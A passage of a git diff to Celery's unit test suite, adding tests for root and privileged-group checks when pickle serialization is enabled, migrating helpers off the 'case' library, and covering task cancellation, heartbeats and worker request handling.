+def test_check_privileges_with_c_force_root(os_module, accept_content):
+ os_module.environ = {'C_FORCE_ROOT': 'true'}
+ os_module.getuid.return_value = 0
+ os_module.getgid.return_value = 0
+ os_module.geteuid.return_value = 0
+ os_module.getegid.return_value = 0
+
+ with pytest.warns(SecurityWarning):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize(('accept_content', 'group_name'), [
+ ({'pickle'}, 'sudo'),
+ ({'application/group-python-serialize'}, 'sudo'),
+ ({'pickle', 'application/group-python-serialize'}, 'sudo'),
+ ({'pickle'}, 'wheel'),
+ ({'application/group-python-serialize'}, 'wheel'),
+ ({'pickle', 'application/group-python-serialize'}, 'wheel'),
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_with_c_force_root_and_with_suspicious_group(
+ grp_module, os_module, accept_content, group_name
+):
+ os_module.environ = {'C_FORCE_ROOT': 'true'}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.return_value = [group_name]
+ grp_module.getgrgid.return_value = [group_name]
+
+ expected_message = re.escape(ROOT_DISCOURAGED.format(uid=60, euid=60,
+ gid=60, egid=60))
+ with pytest.warns(SecurityWarning, match=expected_message):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize(('accept_content', 'group_name'), [
+ ({'pickle'}, 'sudo'),
+ ({'application/group-python-serialize'}, 'sudo'),
+ ({'pickle', 'application/group-python-serialize'}, 'sudo'),
+ ({'pickle'}, 'wheel'),
+ ({'application/group-python-serialize'}, 'wheel'),
+ ({'pickle', 'application/group-python-serialize'}, 'wheel'),
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_without_c_force_root_and_with_suspicious_group(
+ grp_module, os_module, accept_content, group_name
+):
+ os_module.environ = {}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.return_value = [group_name]
+ grp_module.getgrgid.return_value = [group_name]
+
+ expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60,
+ gid=60, egid=60))
+ with pytest.raises(SecurityError,
+ match=expected_message):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_with_c_force_root_and_no_group_entry(
+ grp_module, os_module, accept_content, recwarn
+):
+ os_module.environ = {'C_FORCE_ROOT': 'true'}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.side_effect = KeyError
+
+ expected_message = ROOT_DISCOURAGED.format(uid=60, euid=60,
+ gid=60, egid=60)
+
+ check_privileges(accept_content)
+ assert len(recwarn) == 2
+
+ assert recwarn[0].message.args[0] == ASSUMING_ROOT
+ assert recwarn[1].message.args[0] == expected_message
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_without_c_force_root_and_no_group_entry(
+ grp_module, os_module, accept_content, recwarn
+):
+ os_module.environ = {}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.side_effect = KeyError
+
+ expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60,
+ gid=60, egid=60))
+ with pytest.raises(SecurityError,
+ match=expected_message):
+ check_privileges(accept_content)
+
+ assert recwarn[0].message.args[0] == ASSUMING_ROOT
+
+
+def test_skip_checking_privileges_when_grp_is_unavailable(recwarn):
+ with patch("celery.platforms.grp", new=None):
check_privileges({'pickle'})
- finally:
- platforms.os = prev
+
+ assert len(recwarn) == 0
+
+
+def test_skip_checking_privileges_when_pwd_is_unavailable(recwarn):
+ with patch("celery.platforms.pwd", new=None):
+ check_privileges({'pickle'})
+
+ assert len(recwarn) == 0
diff --git a/t/unit/utils/test_saferepr.py b/t/unit/utils/test_saferepr.py
index e21fe25dbf7..68976f291ac 100644
--- a/t/unit/utils/test_saferepr.py
+++ b/t/unit/utils/test_saferepr.py
@@ -74,7 +74,7 @@ class list2(list):
class list3(list):
def __repr__(self):
- return list.__repr__(self)
+ return super().__repr__()
class tuple2(tuple):
@@ -84,7 +84,7 @@ class tuple2(tuple):
class tuple3(tuple):
def __repr__(self):
- return tuple.__repr__(self)
+ return super().__repr__()
class set2(set):
@@ -94,7 +94,7 @@ class set2(set):
class set3(set):
def __repr__(self):
- return set.__repr__(self)
+ return super().__repr__()
class frozenset2(frozenset):
@@ -104,7 +104,7 @@ class frozenset2(frozenset):
class frozenset3(frozenset):
def __repr__(self):
- return frozenset.__repr__(self)
+ return super().__repr__()
class dict2(dict):
@@ -114,7 +114,7 @@ class dict2(dict):
class dict3(dict):
def __repr__(self):
- return dict.__repr__(self)
+ return super().__repr__()
class test_saferepr:
diff --git a/t/unit/utils/test_serialization.py b/t/unit/utils/test_serialization.py
index 2f625fdb35f..bf83a0d68b5 100644
--- a/t/unit/utils/test_serialization.py
+++ b/t/unit/utils/test_serialization.py
@@ -6,7 +6,6 @@
import pytest
import pytz
-from case import mock
from kombu import Queue
from celery.utils.serialization import (STRTOBOOL_DEFAULT_TABLE,
@@ -18,14 +17,14 @@
class test_AAPickle:
- def test_no_cpickle(self):
+ @pytest.mark.masked_modules('cPickle')
+ def test_no_cpickle(self, mask_modules):
prev = sys.modules.pop('celery.utils.serialization', None)
try:
- with mock.mask_modules('cPickle'):
- import pickle as orig_pickle
+ import pickle as orig_pickle
- from celery.utils.serialization import pickle
- assert pickle.dumps is orig_pickle.dumps
+ from celery.utils.serialization import pickle
+ assert pickle.dumps is orig_pickle.dumps
finally:
sys.modules['celery.utils.serialization'] = prev
diff --git a/t/unit/utils/test_threads.py b/t/unit/utils/test_threads.py
index 758b39e4265..132f3504bc4 100644
--- a/t/unit/utils/test_threads.py
+++ b/t/unit/utils/test_threads.py
@@ -1,10 +1,10 @@
from unittest.mock import patch
import pytest
-from case import mock
from celery.utils.threads import (Local, LocalManager, _FastLocalStack,
_LocalStack, bgThread)
+from t.unit import conftest
class test_bgThread:
@@ -17,7 +17,7 @@ def body(self):
raise KeyError()
with patch('os._exit') as _exit:
- with mock.stdouts():
+ with conftest.stdouts():
_exit.side_effect = ValueError()
t = T()
with pytest.raises(ValueError):
diff --git a/t/unit/utils/test_timer2.py b/t/unit/utils/test_timer2.py
index fe022d8a345..9675452a571 100644
--- a/t/unit/utils/test_timer2.py
+++ b/t/unit/utils/test_timer2.py
@@ -44,14 +44,15 @@ def test_ensure_started_not_started(self):
t.start.assert_called_with()
@patch('celery.utils.timer2.sleep')
- def test_on_tick(self, sleep):
+ @patch('os._exit') # To ensure the test fails gracefully
+ def test_on_tick(self, _exit, sleep):
def next_entry_side_effect():
# side effect simulating following scenario:
# 3.33, 3.33, 3.33,
for _ in range(3):
yield 3.33
while True:
- yield t._is_shutdown.set()
+ yield getattr(t, "_Timer__is_shutdown").set()
on_tick = Mock(name='on_tick')
t = timer2.Timer(on_tick=on_tick)
@@ -61,6 +62,7 @@ def next_entry_side_effect():
t.run()
sleep.assert_called_with(3.33)
on_tick.assert_has_calls([call(3.33), call(3.33), call(3.33)])
+ _exit.assert_not_called()
@patch('os._exit')
def test_thread_crash(self, _exit):
@@ -72,12 +74,16 @@ def test_thread_crash(self, _exit):
def test_gc_race_lost(self):
t = timer2.Timer()
- t._is_stopped.set = Mock()
- t._is_stopped.set.side_effect = TypeError()
-
- t._is_shutdown.set()
- t.run()
- t._is_stopped.set.assert_called_with()
+ with patch.object(t, "_Timer__is_stopped") as mock_stop_event:
+ # Mark the timer as shutting down so we escape the run loop,
+ # mocking the running state so we don't block!
+ with patch.object(t, "running", new=False):
+ t.stop()
+ # Pretend like the interpreter has shutdown and GCed built-in
+ # modules, causing an exception
+ mock_stop_event.set.side_effect = TypeError()
+ t.run()
+ mock_stop_event.set.assert_called_with()
def test_test_enter(self):
t = timer2.Timer()
diff --git a/t/unit/worker/test_autoscale.py b/t/unit/worker/test_autoscale.py
index 44742abf1ba..f6c63c57ac3 100644
--- a/t/unit/worker/test_autoscale.py
+++ b/t/unit/worker/test_autoscale.py
@@ -2,7 +2,7 @@
from time import monotonic
from unittest.mock import Mock, patch
-from case import mock
+import pytest
from celery.concurrency.base import BasePool
from celery.utils.objects import Bunch
@@ -90,16 +90,18 @@ def join(self, timeout=None):
worker = Mock(name='worker')
x = Scaler(self.pool, 10, 3, worker=worker)
- x._is_stopped.set()
- x.stop()
+ # Don't allow thread joining or event waiting to block the test
+ with patch("threading.Thread.join"), patch("threading.Event.wait"):
+ x.stop()
assert x.joined
x.joined = False
x.alive = False
- x.stop()
+ with patch("threading.Thread.join"), patch("threading.Event.wait"):
+ x.stop()
assert not x.joined
- @mock.sleepdeprived(module=autoscale)
- def test_body(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_body(self, sleepdeprived):
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
x.body()
@@ -123,13 +125,13 @@ class Scaler(autoscale.Autoscaler):
def body(self):
self.scale_called = True
- self._is_shutdown.set()
+ getattr(self, "_bgThread__is_shutdown").set()
worker = Mock(name='worker')
x = Scaler(self.pool, 10, 3, worker=worker)
x.run()
- assert x._is_shutdown.isSet()
- assert x._is_stopped.isSet()
+ assert getattr(x, "_bgThread__is_shutdown").is_set()
+ assert getattr(x, "_bgThread__is_stopped").is_set()
assert x.scale_called
def test_shrink_raises_exception(self):
@@ -200,7 +202,7 @@ def test_thread_crash(self, _exit):
class _Autoscaler(autoscale.Autoscaler):
def body(self):
- self._is_shutdown.set()
+ getattr(self, "_bgThread__is_shutdown").set()
raise OSError('foo')
worker = Mock(name='worker')
x = _Autoscaler(self.pool, 10, 3, worker=worker)
@@ -214,8 +216,8 @@ def body(self):
_exit.assert_called_with(1)
stderr.write.assert_called()
- @mock.sleepdeprived(module=autoscale)
- def test_no_negative_scale(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_no_negative_scale(self, sleepdeprived):
total_num_processes = []
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
diff --git a/t/unit/worker/test_consumer.py b/t/unit/worker/test_consumer.py
index f7530ef6b37..0e7ce90818f 100644
--- a/t/unit/worker/test_consumer.py
+++ b/t/unit/worker/test_consumer.py
@@ -5,15 +5,17 @@
import pytest
from billiard.exceptions import RestartFreqExceeded
-from case import ContextMock
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.collections import LimitedSet
from celery.worker.consumer.agent import Agent
-from celery.worker.consumer.consumer import CLOSE, TERMINATE, Consumer
+from celery.worker.consumer.consumer import (CANCEL_TASKS_BY_DEFAULT, CLOSE,
+ TERMINATE, Consumer)
from celery.worker.consumer.gossip import Gossip
from celery.worker.consumer.heart import Heart
from celery.worker.consumer.mingle import Mingle
from celery.worker.consumer.tasks import Tasks
+from celery.worker.state import active_requests
class test_Consumer:
@@ -272,6 +274,39 @@ def test_connect_error_handler_progress(self, error):
errback(Mock(), 6)
assert error.call_args[0][3] == 'Trying again in 6.00 seconds... (3/3)'
+ def test_cancel_long_running_tasks_on_connection_loss(self):
+ c = self.get_consumer()
+ c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = True
+
+ mock_request_acks_late_not_acknowledged = Mock()
+ mock_request_acks_late_not_acknowledged.task.acks_late = True
+ mock_request_acks_late_not_acknowledged.acknowledged = False
+ mock_request_acks_late_acknowledged = Mock()
+ mock_request_acks_late_acknowledged.task.acks_late = True
+ mock_request_acks_late_acknowledged.acknowledged = True
+ mock_request_acks_early = Mock()
+ mock_request_acks_early.task.acks_late = False
+ mock_request_acks_early.acknowledged = False
+
+ active_requests.add(mock_request_acks_late_not_acknowledged)
+ active_requests.add(mock_request_acks_late_acknowledged)
+ active_requests.add(mock_request_acks_early)
+
+ c.on_connection_error_after_connected(Mock())
+
+ mock_request_acks_late_not_acknowledged.cancel.assert_called_once_with(c.pool)
+ mock_request_acks_late_acknowledged.cancel.assert_not_called()
+ mock_request_acks_early.cancel.assert_not_called()
+
+ active_requests.clear()
+
+ def test_cancel_long_running_tasks_on_connection_loss__warning(self):
+ c = self.get_consumer()
+ c.app.conf.worker_cancel_long_running_tasks_on_connection_loss = False
+
+ with pytest.deprecated_call(match=CANCEL_TASKS_BY_DEFAULT):
+ c.on_connection_error_after_connected(Mock())
+
class test_Heart:
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index c2edc58696c..0d53d65e3bc 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -1,5 +1,6 @@
import socket
import sys
+import time
from collections import defaultdict
from datetime import datetime, timedelta
from queue import Queue as FastQueue
@@ -11,12 +12,12 @@
from celery.utils.collections import AttributeDict
from celery.utils.timer2 import Timer
-from celery.worker import WorkController as _WC # noqa
+from celery.worker import WorkController as _WC
from celery.worker import consumer, control
from celery.worker import state as worker_state
from celery.worker.pidbox import Pidbox, gPidbox
from celery.worker.request import Request
-from celery.worker.state import revoked
+from celery.worker.state import REVOKE_EXPIRES, revoked
hostname = socket.gethostname()
@@ -192,6 +193,22 @@ def test_hello(self):
finally:
worker_state.revoked.discard('revoked1')
+ def test_hello_does_not_send_expired_revoked_items(self):
+ consumer = Consumer(self.app)
+ panel = self.create_panel(consumer=consumer)
+ panel.state.app.clock.value = 313
+ panel.state.hostname = 'elaine@vandelay.com'
+ # Add an expired revoked item to the revoked set.
+ worker_state.revoked.add(
+ 'expired_in_past',
+ now=time.monotonic() - REVOKE_EXPIRES - 1
+ )
+ x = panel.handle('hello', {
+ 'from_node': 'george@vandelay.com',
+ 'revoked': {'1234', '4567', '891'}
+ })
+ assert 'expired_in_past' not in x['revoked']
+
def test_conf(self):
consumer = Consumer(self.app)
panel = self.create_panel(consumer=consumer)
@@ -298,6 +315,20 @@ def test_active(self):
finally:
worker_state.active_requests.discard(r)
+ def test_active_safe(self):
+ kwargsrepr = ''
+ r = Request(
+ self.TaskMessage(self.mytask.name, id='do re mi',
+ kwargsrepr=kwargsrepr),
+ app=self.app,
+ )
+ worker_state.active_requests.add(r)
+ try:
+ active_resp = self.panel.handle('dump_active', {'safe': True})
+ assert active_resp[0]['kwargs'] == kwargsrepr
+ finally:
+ worker_state.active_requests.discard(r)
+
def test_pool_grow(self):
class MockPool:
diff --git a/t/unit/worker/test_loops.py b/t/unit/worker/test_loops.py
index 27d1b832ea0..2b2db226554 100644
--- a/t/unit/worker/test_loops.py
+++ b/t/unit/worker/test_loops.py
@@ -158,9 +158,10 @@ def test_setup_heartbeat(self):
asynloop(*x.args)
x.consumer.consume.assert_called_with()
x.obj.on_ready.assert_called_with()
- x.hub.timer.call_repeatedly.assert_called_with(
- 10 / 2.0, x.connection.heartbeat_check, (2.0,),
- )
+ last_call_args, _ = x.hub.timer.call_repeatedly.call_args
+
+ assert last_call_args[0] == 10 / 2.0
+ assert last_call_args[2] == (2.0,)
def task_context(self, sig, **kwargs):
x, on_task = get_task_callback(self.app, **kwargs)
@@ -429,6 +430,30 @@ def test_poll_raises_ValueError(self):
asynloop(*x.args)
poller.poll.assert_called()
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.connection.heartbeat_check = Mock(
+ side_effect=RuntimeError("Heartbeat error")
+ )
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.hub.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ asynloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.hub.on_tick.add(x.closer(mod=2))
+ asynloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
class test_synloop:
@@ -459,6 +484,49 @@ def test_ignores_socket_errors_when_closed(self):
x.close_then_error(x.connection.drain_events)
assert synloop(*x.args) is None
+ def test_no_connection(self):
+ x = X(self.app)
+ x.connection = None
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.blueprint.state = CLOSE
+ synloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.obj.pool.is_green = True
+
+ def heartbeat_check(rate):
+ raise RuntimeError('Heartbeat error')
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.connection.heartbeat_check = Mock(
+ name='heartbeat_check', side_effect=heartbeat_check
+ )
+ x.obj.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ synloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.obj.pool.is_green = True
+ x.obj.timer.call_repeatedly = Mock(
+ name='x.obj.timer.call_repeatedly()'
+ )
+
+ def drain_events(timeout):
+ x.blueprint.state = CLOSE
+ x.connection.drain_events.side_effect = drain_events
+ synloop(*x.args)
+
+ x.obj.timer.call_repeatedly.assert_not_called()
+
class test_quick_drain:
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 039af717b2d..2c49f777103 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -2,25 +2,24 @@
import os
import signal
import socket
-import sys
from datetime import datetime, timedelta
from time import monotonic, time
from unittest.mock import Mock, patch
import pytest
from billiard.einfo import ExceptionInfo
-from kombu.utils.encoding import (default_encode, from_utf8, safe_repr,
- safe_str)
+from kombu.utils.encoding import from_utf8, safe_repr, safe_str
from kombu.utils.uuid import uuid
from celery import states
-from celery.app.trace import (TraceInfo, _trace_task_ret, build_tracer,
+from celery.app.trace import (TraceInfo, build_tracer, fast_trace_task,
mro_lookup, reset_worker_optimizations,
- setup_worker_optimizations, trace_task)
+ setup_worker_optimizations, trace_task,
+ trace_task_ret)
from celery.backends.base import BaseDictBackend
from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry,
TaskRevokedError, Terminated, WorkerLostError)
-from celery.signals import task_revoked
+from celery.signals import task_failure, task_retry, task_revoked
from celery.worker import request as module
from celery.worker import strategy
from celery.worker.request import Request, create_request_cls
@@ -36,16 +35,19 @@ def setup(self):
@self.app.task(shared=False)
def add(x, y, **kw_):
return x + y
+
self.add = add
@self.app.task(shared=False)
def mytask(i, **kwargs):
return i ** i
+
self.mytask = mytask
@self.app.task(shared=False)
def mytask_raising(i):
raise KeyError(i)
+
self.mytask_raising = mytask_raising
def xRequest(self, name=None, id=None, args=None, kwargs=None,
@@ -64,7 +66,6 @@ def xRequest(self, name=None, id=None, args=None, kwargs=None,
class test_mro_lookup:
def test_order(self):
-
class A:
pass
@@ -90,8 +91,9 @@ def mro(cls):
assert mro_lookup(D, 'x') is None
-def jail(app, task_id, name, args, kwargs):
+def jail(app, task_id, name, request_opts, args, kwargs):
request = {'id': task_id}
+ request.update(request_opts)
task = app.tasks[name]
task.__trace__ = None # rebuild
return trace_task(
@@ -99,29 +101,6 @@ def jail(app, task_id, name, args, kwargs):
).retval
-@pytest.mark.skipif(sys.version_info[0] > 3, reason='Py2 only')
-class test_default_encode:
-
- def test_jython(self):
- prev, sys.platform = sys.platform, 'java 1.6.1'
- try:
- assert default_encode(b'foo') == b'foo'
- finally:
- sys.platform = prev
-
- def test_cpython(self):
- prev, sys.platform = sys.platform, 'darwin'
- gfe, sys.getfilesystemencoding = (
- sys.getfilesystemencoding,
- lambda: 'utf-8',
- )
- try:
- assert default_encode(b'foo') == b'foo'
- finally:
- sys.platform = prev
- sys.getfilesystemencoding = gfe
-
-
class test_Retry:
def test_retry_semipredicate(self):
@@ -139,7 +118,7 @@ def test_process_cleanup_fails(self, patching):
self.mytask.backend = Mock()
self.mytask.backend.process_cleanup = Mock(side_effect=KeyError())
tid = uuid()
- ret = jail(self.app, tid, self.mytask.name, [2], {})
+ ret = jail(self.app, tid, self.mytask.name, {}, [2], {})
assert ret == 4
self.mytask.backend.mark_as_done.assert_called()
assert 'Process cleanup failed' in _logger.error.call_args[0][0]
@@ -148,10 +127,10 @@ def test_process_cleanup_BaseException(self):
self.mytask.backend = Mock()
self.mytask.backend.process_cleanup = Mock(side_effect=SystemExit())
with pytest.raises(SystemExit):
- jail(self.app, uuid(), self.mytask.name, [2], {})
+ jail(self.app, uuid(), self.mytask.name, {}, [2], {})
def test_execute_jail_success(self):
- ret = jail(self.app, uuid(), self.mytask.name, [2], {})
+ ret = jail(self.app, uuid(), self.mytask.name, {}, [2], {})
assert ret == 4
def test_marked_as_started(self):
@@ -160,34 +139,47 @@ def test_marked_as_started(self):
def store_result(tid, meta, state, **kwargs):
if state == states.STARTED:
_started.append(tid)
+
self.mytask.backend.store_result = Mock(name='store_result')
self.mytask.backend.store_result.side_effect = store_result
self.mytask.track_started = True
tid = uuid()
- jail(self.app, tid, self.mytask.name, [2], {})
+ jail(self.app, tid, self.mytask.name, {}, [2], {})
assert tid in _started
self.mytask.ignore_result = True
tid = uuid()
- jail(self.app, tid, self.mytask.name, [2], {})
+ jail(self.app, tid, self.mytask.name, {}, [2], {})
assert tid not in _started
def test_execute_jail_failure(self):
ret = jail(
- self.app, uuid(), self.mytask_raising.name, [4], {},
+ self.app, uuid(), self.mytask_raising.name, {}, [4], {},
)
assert isinstance(ret, ExceptionInfo)
assert ret.exception.args == (4,)
- def test_execute_ignore_result(self):
-
+ def test_execute_task_ignore_result(self):
@self.app.task(shared=False, ignore_result=True)
def ignores_result(i):
return i ** i
task_id = uuid()
- ret = jail(self.app, task_id, ignores_result.name, [4], {})
+ ret = jail(self.app, task_id, ignores_result.name, {}, [4], {})
+ assert ret == 256
+ assert not self.app.AsyncResult(task_id).ready()
+
+ def test_execute_request_ignore_result(self):
+ @self.app.task(shared=False)
+ def ignores_result(i):
+ return i ** i
+
+ task_id = uuid()
+ ret = jail(
+ self.app, task_id, ignores_result.name,
+ {'ignore_result': True}, [4], {}
+ )
assert ret == 256
assert not self.app.AsyncResult(task_id).ready()
@@ -236,16 +228,20 @@ def test_info_function(self):
import string
kwargs = {}
for i in range(0, 2):
- kwargs[str(i)] = ''.join(random.choice(string.ascii_lowercase) for i in range(1000))
+ kwargs[str(i)] = ''.join(
+ random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == kwargs
+ self.add.s(**kwargs)).info(safe=True).get(
+ 'kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
for i in range(0, 2):
- args.append(''.join(random.choice(string.ascii_lowercase) for i in range(1000)))
+ args.append(''.join(
+ random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == args
+ self.add.s(*args)).info(safe=True).get(
+ 'args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
@@ -341,32 +337,69 @@ def test_on_failure_Reject_rejects_with_requeue(self):
)
def test_on_failure_WorkerLostError_rejects_with_requeue(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = False
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
def test_on_failure_WorkerLostError_redelivered_None(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = None
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
+
+ def test_on_failure_WorkerLostError_redelivered_True(self):
+ try:
+ raise WorkerLostError()
+ except WorkerLostError:
+ einfo = ExceptionInfo(internal=True)
+
+ req = self.get_request(self.add.s(2, 2))
+ req.task.acks_late = False
+ req.task.reject_on_worker_lost = True
+ req.delivery_info['redelivered'] = True
+ req.task.backend = Mock()
+
+ with self.assert_signal_called(
+ task_failure,
+ sender=req.task,
+ task_id=req.id,
+ exception=einfo.exception,
+ args=req.args,
+ kwargs=req.kwargs,
+ traceback=einfo.traceback,
+ einfo=einfo
+ ):
+ req.on_failure(einfo)
+
+ req.task.backend.mark_as_failure.assert_called_once_with(req.id,
+ einfo.exception,
+ request=req._context,
+ store_result=True)
def test_tzlocal_is_cached(self):
req = self.get_request(self.add.s(2, 2))
@@ -458,6 +491,23 @@ def test_terminate__task_started(self):
job.terminate(pool, signal='TERM')
pool.terminate_job.assert_called_with(job.worker_pid, signum)
+ def test_cancel__pool_ref(self):
+ pool = Mock()
+ signum = signal.SIGTERM
+ job = self.get_request(self.mytask.s(1, f='x'))
+ job._apply_result = Mock(name='_apply_result')
+ with self.assert_signal_called(
+ task_retry, sender=job.task, request=job._context,
+ einfo=None):
+ job.time_start = monotonic()
+ job.worker_pid = 314
+ job.cancel(pool, signal='TERM')
+ job._apply_result().terminate.assert_called_with(signum)
+
+ job._apply_result = Mock(name='_apply_result2')
+ job._apply_result.return_value = None
+ job.cancel(pool, signal='TERM')
+
def test_terminate__task_reserved(self):
pool = Mock()
job = self.get_request(self.mytask.s(1, f='x'))
@@ -467,6 +517,27 @@ def test_terminate__task_reserved(self):
assert job._terminate_on_ack == (pool, 15)
job.terminate(pool, signal='TERM')
+ def test_cancel__task_started(self):
+ pool = Mock()
+ signum = signal.SIGTERM
+ job = self.get_request(self.mytask.s(1, f='x'))
+ job._apply_result = Mock(name='_apply_result')
+ with self.assert_signal_called(
+ task_retry, sender=job.task, request=job._context,
+ einfo=None):
+ job.time_start = monotonic()
+ job.worker_pid = 314
+ job.cancel(pool, signal='TERM')
+ job._apply_result().terminate.assert_called_with(signum)
+
+ def test_cancel__task_reserved(self):
+ pool = Mock()
+ job = self.get_request(self.mytask.s(1, f='x'))
+ job.time_start = None
+ job.cancel(pool, signal='TERM')
+ pool.terminate_job.assert_not_called()
+ assert job._terminate_on_ack is None
+
def test_revoked_expires_expired(self):
job = self.get_request(self.mytask.s(1, f='x').set(
expires=datetime.utcnow() - timedelta(days=1)
@@ -676,7 +747,8 @@ def test_on_failure_acks_on_failure_or_timeout_disabled_for_task(self):
job.on_failure(exc_info)
assert job.acknowledged is True
- job._on_reject.assert_called_with(req_logger, job.connection_errors, False)
+ job._on_reject.assert_called_with(req_logger, job.connection_errors,
+ False)
def test_on_failure_acks_on_failure_or_timeout_enabled_for_task(self):
job = self.xRequest()
@@ -718,6 +790,22 @@ def test_on_failure_acks_on_failure_or_timeout_enabled(self):
job.on_failure(exc_info)
assert job.acknowledged is True
+ def test_on_failure_task_cancelled(self):
+ job = self.xRequest()
+ job.eventer = Mock()
+ job.time_start = 1
+ job._already_cancelled = True
+
+ try:
+ raise Terminated()
+ except Terminated:
+ exc_info = ExceptionInfo()
+
+ job.on_failure(exc_info)
+
+ job.on_failure(exc_info)
+ assert not job.eventer.send.called
+
def test_from_message_invalid_kwargs(self):
m = self.TaskMessage(self.mytask.name, args=(), kwargs='foo')
req = Request(m, app=self.app)
@@ -786,9 +874,9 @@ def test_on_soft_timeout(self, patching):
assert self.mytask.backend.get_status(job.id) == states.PENDING
def test_fast_trace_task(self):
- from celery.app import trace
+ assert self.app.use_fast_trace_task is False
setup_worker_optimizations(self.app)
- assert trace.trace_task_ret is trace._fast_trace_task
+ assert self.app.use_fast_trace_task is True
tid = uuid()
message = self.TaskMessage(self.mytask.name, tid, args=[4])
assert len(message.payload) == 3
@@ -797,7 +885,7 @@ def test_fast_trace_task(self):
self.mytask.name, self.mytask, self.app.loader, 'test',
app=self.app,
)
- failed, res, runtime = trace.trace_task_ret(
+ failed, res, runtime = fast_trace_task(
self.mytask.name, tid, message.headers, message.body,
message.content_type, message.content_encoding)
assert not failed
@@ -805,10 +893,10 @@ def test_fast_trace_task(self):
assert runtime is not None
assert isinstance(runtime, numbers.Real)
finally:
- reset_worker_optimizations()
- assert trace.trace_task_ret is trace._trace_task_ret
+ reset_worker_optimizations(self.app)
+ assert self.app.use_fast_trace_task is False
delattr(self.mytask, '__trace__')
- failed, res, runtime = trace.trace_task_ret(
+ failed, res, runtime = trace_task_ret(
self.mytask.name, tid, message.headers, message.body,
message.content_type, message.content_encoding, app=self.app,
)
@@ -824,7 +912,7 @@ def test_trace_task_ret(self):
)
tid = uuid()
message = self.TaskMessage(self.mytask.name, tid, args=[4])
- _, R, _ = _trace_task_ret(
+ _, R, _ = trace_task_ret(
self.mytask.name, tid, message.headers,
message.body, message.content_type,
message.content_encoding, app=self.app,
@@ -838,7 +926,7 @@ def test_trace_task_ret__no_trace(self):
pass
tid = uuid()
message = self.TaskMessage(self.mytask.name, tid, args=[4])
- _, R, _ = _trace_task_ret(
+ _, R, _ = trace_task_ret(
